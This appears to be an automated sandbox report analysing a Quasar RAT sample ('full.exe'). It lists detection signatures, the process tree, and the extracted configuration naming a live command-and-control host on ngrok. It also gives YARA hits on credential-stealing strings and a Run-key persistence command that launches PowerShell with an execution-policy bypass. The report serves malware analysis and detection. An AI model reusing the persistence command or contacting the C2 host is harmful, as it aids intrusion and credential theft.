Edit tour

Windows Analysis Report
full.exe

Overview

General Information

Sample name:	full.exe
Analysis ID:	1573924
MD5:	b59ee68c7c3ee01e14a7516628368046
SHA1:	7a0cc3f080d1c2143e770d1fd50dc7f20bef9f7a
SHA256:	e32128f875d42818741d274d447aacf2cdc15cc78a2ce0a393d629c4c90c779d
Tags:	exeuser-smica83
Infos:

Detection

Quasar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

Yara detected Quasar RAT

.NET source code references suspicious native API functions

AI detected suspicious sample

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Creates autostart registry keys with suspicious values (likely registry only malware)

Found Tor onion address

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Installs new ROOT certificates

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Writes to foreign memory regions

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Direct Autorun Keys Modification

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Sigma detected: Suspicious Powershell In Registry Run Keys

Stores large binary data to the registry

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Yara signature match

Classification

Process Tree

System is w10x64

full.exe (PID: 5644 cmdline: "C:\Users\user\Desktop\full.exe" MD5: B59EE68C7C3EE01E14A7516628368046)

conhost.exe (PID: 3368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 4680 cmdline: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AdobePS1 /t REG_SZ /d "powershell -ExecutionPolicy Bypass -File \"C:\Users\user\AppData\Local\Temp\Adobe.ps1\"" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

powershell.exe (PID: 4452 cmdline: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\Adobe.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)

InstallUtil.exe (PID: 5084 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

InstallUtil.exe (PID: 6188 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

InstallUtil.exe (PID: 4792 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

cmd.exe (PID: 5624 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\aVqnxsyILS0b.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7028 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)

PING.EXE (PID: 6244 cmdline: ping -n 10 localhost MD5: B3624DD758CCECF93A1226CEF252CA12)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Quasar RAT, QuasarRAT	Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.	APT33 Dropping Elephant Stone Panda The Gorgon Group	http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/master-of-rats-how-to-create-your-own-tracker/20848 https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf https://asec.ahnlab.com/en/31089/	https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat

Malware Configuration

Threatname: Quasar

{"Version": "1.4.1", "Host:Port": "1.tcp.sa.ngrok.io:20545;", "SubDirectory": "SubDir", "InstallName": "Client.exe", "MutexName": "a888ff96-3c09-47a6-9d99-754a5cdfdb56", "StartupKey": "Quasar Client Startup", "Tag": "Office04", "LogDirectoryName": "Logs", "ServerSignature": "Y9VoNeyeM++0LGCoGVcPsDliF341s/s1wChlfQacyTiOU7Sx1m4MTha5uh8Ccuc7TiKr7LiIFRgQa/A7bEH9k/sECgcq5B03RgxIMP15eFvdR4IQ1Q/ntBSjrKP3QfPWH3l3LfYefczmBttpVcWbvUjZiKq+frzJPIe8w5Kue36hFCcj1IwamTKWqowDzPNjbMglCvMu9+FWGDrerY56UiHr/eB5U3cDEDrwD2FOzo1Mx2X69wO70wXrBKi1YX7tswNN+4AqxYZ3u6us6JtfA04F59ZX3gErC3kITccyVU0tYkT6NN9/h0Mo3rx+gCB9c/hWHaQ1y1rTx6hiLRrxJ1nyNgYKpiRO+yyhK01iQEqcnd6ZI+lAyli9ezzydxNEiY7nU0V1UX6Ihu+9NAf5PeYO13JiYlMi7MLZI/69Shd2B2+EV5t2HK5kkyHxrSm3UnSCN0odpcdWhQxuY2EDRqZzXM5yyFXvWkuCDXGUYGpx9lhaO8gUK07udqQzNyHkJgsEWD7tmOwRoDB4Lu77buDF0b9tZ7Ok5GAlRRMV7aDztLE7YjAAYhu/1HIno3lX9Wanf9FC0fCXwY0+BQumK50rMAF4WBy2x0KNzFR7D6C9w25dMqHnzemZ/U1IlpJuXOrr+mkzZst4rgjB6dipgMTWgHGMLYfluVzquIoPLAE=", "ServerCertificate": "MIIE9DCCAtygAwIBAgIQAOk8qraUkzEDweoNS22W8zANBgkqhkiG9w0BAQ0FADAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMCAXDTI0MTEyMTA1MzcwMVoYDzk5OTkxMjMxMjM1OTU5WjAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAkI9dpABHaWIr76Y/HzS4JxheFPuAUxoAdViPqSp1xX+tQyfVaqepzAtkDoOIVpTF4uspRzQEPGTSoy26rDha4jfbYD+2vmOlfAJli1OCZsqCH5z2of74NA59vhFV5v2UcE4eyqmE0KNSkBxsw7yR06G8tkWLf31ULmqd9CAxoCAGeUXBa63JeQaPm03z+tE6g10LEaQ3keTszqNsdlkt1QucpoSoo+Ufc5uG56EIiLTnarO8xI2l1ZcJLDJhUbGh426dUto/YUChrNLurBGiRDWfB6JGgQ3n3FcLU5ioKuR8QxsPjAgGJE8k1kPTbZ8dbw4KHN4wzMBPPJl+1Co1airF3GWjVCiwtouJ6nkasy+pzmBDaRCP4aX/v4qPRZmjSLZi/OpWQ1AlJt8vdMiumbFAoa8nHXhUIp5+SPGoT/Wp28iyvSul8B/Wbkb4SQOWCp1VaQoCQJ2fOMo+QoS50e+xijozAjobUh7KlAyph9Kq9wYB0OQyebULyhxijXNBubLM1qu9ytoEuMr1YVQX4DFZfKqjIQjTyhPHixsG/wwFYAxoqDYeEXeCIscAmwCzmEcqPTmCGZK3oNb1KtDj0ePA2KD7s8GIlFduTRaJ1j2/C1C0JC22dSwXtj8phpuYKDOerCCYQ6S9Le9Pd0tw2/UESg+VePfsAyNKJsc3Tc8CAwEAAaMyMDAwHQYDVR0OBBYEFDkTHq2063+4lvf6qLVux36heKXxMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADggIBABWdQoQSr8kEYry26cU1M5BLdtld/kO5OfN4L/DoM0Tj6nY+ty5/bJq+PlK0KhFykSb3sWa5PycTTaWzIlMeoPcf7Yti9ovnlHCf1EFYsBGFZuRU7YS1vHETdJK40ozlKJZetTXO/zAu4tsNrQ7WNxkaEpNIsrZc1kk6ymVnEfM3kIBhgZV9yFtsoNOdXqWm2JGsP4/8h6biBEWYQSh87q8hRIuYKU7A777gX7DqAJr9VQCiHKBvtPhudvlA3XMZNSsqukAz6RpRQQjAB47K2sawwQ6yyTJHGv9Ylegmt39TBujVzbeUUmCqrUghtkpi2oIpM+lcXxPo4cNjHonXyvICjv7jkFbDkGDvK/O1wyTqhkHD190kkNI5Lmb2wlYvFNeTpw+LCFfqmpt4yjUGNRmVNiYRlXDculHqGlxDV/FMCZUVM3qojyHFI7glvsF9mnP56sq9gxi4Ca2GrmEw/PXlVuHpUOj6sAeOELOrFjCxy2XTjft5UAAMGjX7SGOC+Yp+hWjn33/baeQWhUAfAHiAX4s6UDx4nUIWvfIOwLE3/qzwzd6opkY92iV+tUJIQ1ynw/k1/EBBR6dF9Wak7XwYDS3AKYvAfYIeNNjeJP68RRf9PL8MvfD62X83JCTzU765IYkXe83ht054sI+uxq1E7nncT+0BN9pyasjPI0SW"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000008.00000002.1946047934.0000000003036000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000008.00000002.1913763802.0000000000720000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000005.00000002.1736823660.0000020C23375000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000008.00000002.1946047934.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000008.00000002.1913763802.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
Process Memory Space: powershell.exe PID: 4452	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
8.2.InstallUtil.exe.400000.0.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
8.2.InstallUtil.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
8.2.InstallUtil.exe.400000.0.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x28ef4e:$x1: Quasar.Common.Messages 0x29f277:$x1: Quasar.Common.Messages 0x2ab812:$x4: Uninstalling... good bye :-( 0x2ad007:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
8.2.InstallUtil.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x2aadc4:$f1: FileZilla\recentservers.xml 0x2aae04:$f2: FileZilla\sitemanager.xml 0x2aae46:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x2ab092:$b1: Chrome\User Data\ 0x2ab0e8:$b1: Chrome\User Data\ 0x2ab3c0:$b2: Mozilla\Firefox\Profiles 0x2ab4bc:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2fd440:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2ab614:$b4: Opera Software\Opera Stable\Login Data 0x2ab6ce:$b5: YandexBrowser\User Data\ 0x2ab73c:$b5: YandexBrowser\User Data\ 0x2ab410:$s4: logins.json 0x2ab146:$a1: username_value 0x2ab164:$a2: password_value 0x2ab450:$a3: encryptedUsername 0x2fd384:$a3: encryptedUsername 0x2ab474:$a4: encryptedPassword 0x2fd3a2:$a4: encryptedPassword 0x2fd320:$a5: httpRealm
8.2.InstallUtil.exe.400000.0.unpack	MALWARE_Win_QuasarStealer	Detects Quasar infostealer	ditekshen	0x164f16:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null 0x2ab8fc:$s3: Process already elevated. 0x28ec4d:$s4: get_PotentiallyVulnerablePasswords 0x278cce:$s5: GetKeyloggerLogsDirectory 0x29e9d6:$s5: GetKeyloggerLogsDirectory 0x28ec70:$s6: set_PotentiallyVulnerablePasswords 0x2fea6e:$s7: BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: powershell -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\Adobe.ps1", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 4680, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobePS1\(Default)

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AdobePS1 /t REG_SZ /d "powershell -ExecutionPolicy Bypass -File \"C:\Users\user\AppData\Local\Temp\Adobe.ps1\"" /f, CommandLine: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AdobePS1 /t REG_SZ /d "powershell -ExecutionPolicy Bypass -File \"C:\Users\user\AppData\Local\Temp\Adobe.ps1\"" /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: "C:\Users\user\Desktop\full.exe", ParentImage: C:\Users\user\Desktop\full.exe, ParentProcessId: 5644, ParentProcessName: full.exe, ProcessCommandLine: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AdobePS1 /t REG_SZ /d "powershell -ExecutionPolicy Bypass -File \"C:\Users\user\AppData\Local\Temp\Adobe.ps1\"" /f, ProcessId: 4680, ProcessName: reg.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\Adobe.ps1, CommandLine: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\Adobe.ps1, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\full.exe", ParentImage: C:\Users\user\Desktop\full.exe, ParentProcessId: 5644, ParentProcessName: full.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\Adobe.ps1, ProcessId: 4452, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\Adobe.ps1, CommandLine: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\Adobe.ps1, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\full.exe", ParentImage: C:\Users\user\Desktop\full.exe, ParentProcessId: 5644, ParentProcessName: full.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\Adobe.ps1, ProcessId: 4452, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: powershell -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\Adobe.ps1", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 4680, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobePS1\(Default)

Sigma detected: Direct Autorun Keys Modification

Source: Process started

Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AdobePS1 /t REG_SZ /d "powershell -ExecutionPolicy Bypass -File \"C:\Users\user\AppData\Local\Temp\Adobe.ps1\"" /f, CommandLine: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AdobePS1 /t REG_SZ /d "powershell -ExecutionPolicy Bypass -File \"C:\Users\user\AppData\Local\Temp\Adobe.ps1\"" /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: "C:\Users\user\Desktop\full.exe", ParentImage: C:\Users\user\Desktop\full.exe, ParentProcessId: 5644, ParentProcessName: full.exe, ProcessCommandLine: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AdobePS1 /t REG_SZ /d "powershell -ExecutionPolicy Bypass -File \"C:\Users\user\AppData\Local\Temp\Adobe.ps1\"" /f, ProcessId: 4680, ProcessName: reg.exe

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AdobePS1 /t REG_SZ /d "powershell -ExecutionPolicy Bypass -File \"C:\Users\user\AppData\Local\Temp\Adobe.ps1\"" /f, CommandLine: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AdobePS1 /t REG_SZ /d "powershell -ExecutionPolicy Bypass -File \"C:\Users\user\AppData\Local\Temp\Adobe.ps1\"" /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: "C:\Users\user\Desktop\full.exe", ParentImage: C:\Users\user\Desktop\full.exe, ParentProcessId: 5644, ParentProcessName: full.exe, ProcessCommandLine: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AdobePS1 /t REG_SZ /d "powershell -ExecutionPolicy Bypass -File \"C:\Users\user\AppData\Local\Temp\Adobe.ps1\"" /f, ProcessId: 4680, ProcessName: reg.exe

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AdobePS1 /t REG_SZ /d "powershell -ExecutionPolicy Bypass -File \"C:\Users\user\AppData\Local\Temp\Adobe.ps1\"" /f, CommandLine: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AdobePS1 /t REG_SZ /d "powershell -ExecutionPolicy Bypass -File \"C:\Users\user\AppData\Local\Temp\Adobe.ps1\"" /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: "C:\Users\user\Desktop\full.exe", ParentImage: C:\Users\user\Desktop\full.exe, ParentProcessId: 5644, ParentProcessName: full.exe, ProcessCommandLine: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AdobePS1 /t REG_SZ /d "powershell -ExecutionPolicy Bypass -File \"C:\Users\user\AppData\Local\Temp\Adobe.ps1\"" /f, ProcessId: 4680, ProcessName: reg.exe

Sigma detected: Suspicious Powershell In Registry Run Keys

Source: Registry Key set

Author: frack113, Florian Roth (Nextron Systems): Data: Details: powershell -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\Adobe.ps1", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 4680, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobePS1\(Default)

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\Adobe.ps1, CommandLine: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\Adobe.ps1, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\full.exe", ParentImage: C:\Users\user\Desktop\full.exe, ParentProcessId: 5644, ParentProcessName: full.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\Adobe.ps1, ProcessId: 4452, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE Generic AsyncRAT Style SSL Cert

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T18:03:39.644015+0100	2035595	1	Domain Observed Used for C2 Detected	18.231.236.52	20545	192.168.2.9	49709	TCP

ET MALWARE Observed Malicious SSL Cert (Quasar CnC)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T18:03:39.644015+0100	2027619	1	Domain Observed Used for C2 Detected	18.231.236.52	20545	192.168.2.9	49709	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\aVqnxsyILS0b.bat

Avira: detection malicious, Label: BAT/Delbat.C

Found malware configuration

Source: 8.2.InstallUtil.exe.400000.0.unpack

Malware Configuration Extractor: Quasar {"Version": "1.4.1", "Host:Port": "1.tcp.sa.ngrok.io:20545;", "SubDirectory": "SubDir", "InstallName": "Client.exe", "MutexName": "a888ff96-3c09-47a6-9d99-754a5cdfdb56", "StartupKey": "Quasar Client Startup", "Tag": "Office04", "LogDirectoryName": "Logs", "ServerSignature": "Y9VoNeyeM++0LGCoGVcPsDliF341s/s1wChlfQacyTiOU7Sx1m4MTha5uh8Ccuc7TiKr7LiIFRgQa/A7bEH9k/sECgcq5B03RgxIMP15eFvdR4IQ1Q/ntBSjrKP3QfPWH3l3LfYefczmBttpVcWbvUjZiKq+frzJPIe8w5Kue36hFCcj1IwamTKWqowDzPNjbMglCvMu9+FWGDrerY56UiHr/eB5U3cDEDrwD2FOzo1Mx2X69wO70wXrBKi1YX7tswNN+4AqxYZ3u6us6JtfA04F59ZX3gErC3kITccyVU0tYkT6NN9/h0Mo3rx+gCB9c/hWHaQ1y1rTx6hiLRrxJ1nyNgYKpiRO+yyhK01iQEqcnd6ZI+lAyli9ezzydxNEiY7nU0V1UX6Ihu+9NAf5PeYO13JiYlMi7MLZI/69Shd2B2+EV5t2HK5kkyHxrSm3UnSCN0odpcdWhQxuY2EDRqZzXM5yyFXvWkuCDXGUYGpx9lhaO8gUK07udqQzNyHkJgsEWD7tmOwRoDB4Lu77buDF0b9tZ7Ok5GAlRRMV7aDztLE7YjAAYhu/1HIno3lX9Wanf9FC0fCXwY0+BQumK50rMAF4WBy2x0KNzFR7D6C9w25dMqHnzemZ/U1IlpJuXOrr+mkzZst4rgjB6dipgMTWgHGMLYfluVzquIoPLAE=", "ServerCertificate": "MIIE9DCCAtygAwIBAgIQAOk8qraUkzEDweoNS22W8zANBgkqhkiG9w0BAQ0FADAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMCAXDTI0MTEyMTA1MzcwMVoYDzk5OTkxMjMxMjM1OTU5WjAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAkI9dpABHaWIr76Y/HzS4JxheFPuAUxoAdViPqSp1xX+tQyfVaqepzAtkDoOIVpTF4uspRzQEPGTSoy26rDha4jfbYD+2vmOlfAJli1OCZsqCH5z2of74NA59vhFV5v2UcE4eyqmE0KNSkBxsw7yR06G8tkWLf31ULmqd9CAxoCAGeUXBa63JeQaPm03z+tE6g10LEaQ3keTszqNsdlkt1QucpoSoo+Ufc5uG56EIiLTnarO8xI2l1ZcJLDJhUbGh426dUto/YUChrNLurBGiRDWfB6JGgQ3n3FcLU5ioKuR8QxsPjAgGJE8k1kPTbZ8dbw4KHN4wzMBPPJl+1Co1airF3GWjVCiwtouJ6nkasy+pzmBDaRCP4aX/v4qPRZmjSLZi/OpWQ1AlJt8vdMiumbFAoa8nHXhUIp5+SPGoT/Wp28iyvSul8B/Wbkb4SQOWCp1VaQoCQJ2fOMo+QoS50e+xijozAjobUh7KlAyph9Kq9wYB0OQyebULyhxijXNBubLM1qu9ytoEuMr1YVQX4DFZfKqjIQjTyhPHixsG/wwFYAxoqDYeEXeCIscAmwCzmEcqPTmCGZK3oNb1KtDj0ePA2KD7s8GIlFduTRaJ1j2/C1C0JC22dSwXtj8phpuYKDOerCCYQ6S9Le9Pd0tw2/UESg+VePfsAyNKJsc3Tc8CAwEAAaMyMDAwHQYDVR0OBBYEFDkTHq2063+4lvf6qLVux36heKXxMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADggIBABWdQoQSr8kEYry26cU1M5BLdtld/kO5OfN4L/DoM0Tj6nY+ty5/bJq+PlK0KhFykSb3sWa5PycTTaWzIlMeoPcf7Yti9ovnlHCf1EFYsBGFZuRU7YS1vHETdJK40ozlKJZetTXO/zAu4tsNrQ7WNxkaEpNIsrZc1kk6ymVnEfM3kIBhgZV9yFtsoNOdXqWm2JGsP4/8h6biBEWYQSh87q8hRIuYKU7A777gX7DqAJr9VQCiHKBvtPhudvlA3XMZNSsqukAz6RpRQQjAB47K2sawwQ6yyTJHGv9Ylegmt39TBujVzbeUUmCqrUghtkpi2oIpM+lcXxPo4cNjHonXyvICjv7jkFbDkGDvK/O1wyTqhkHD190kkNI5Lmb2wlYvFNeTpw+LCFfqmpt4yjUGNRmVNiYRlXDculHqGlxDV/FMCZUVM3qojyHFI7glvsF9mnP56sq9gxi4Ca2GrmEw/PXlVuHpUOj6sAeOELOrFjCxy2XTjft5UAAMGjX7SGOC+Yp+hWjn33/baeQWhUAfAHiAX4s6UDx4nUIWvfIOwLE3/qzwzd6opkY92iV+tUJIQ1ynw/k1/EBBR6dF9Wak7XwYDS3AKYvAfYIeNNjeJP68RRf9PL8MvfD62X83JCTzU765IYkXe83ht054sI+uxq1E7nncT+0BN9pyasjPI0SW"}

Yara detected Quasar RAT

Source: Yara match	File source: 8.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1946047934.0000000003036000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1913763802.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1736823660.0000020C23375000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1946047934.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1913763802.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4452, type: MEMORYSTR

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.4% probability

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

Jump to behavior

Source: unknown

HTTPS traffic detected: 108.181.61.49:443 -> 192.168.2.9:49711 version: TLS 1.2

Source: full.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2027619 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (Quasar CnC) : 18.231.236.52:20545 -> 192.168.2.9:49709
Source: Network traffic	Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 18.231.236.52:20545 -> 192.168.2.9:49709

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 1.tcp.sa.ngrok.io

Found Tor onion address

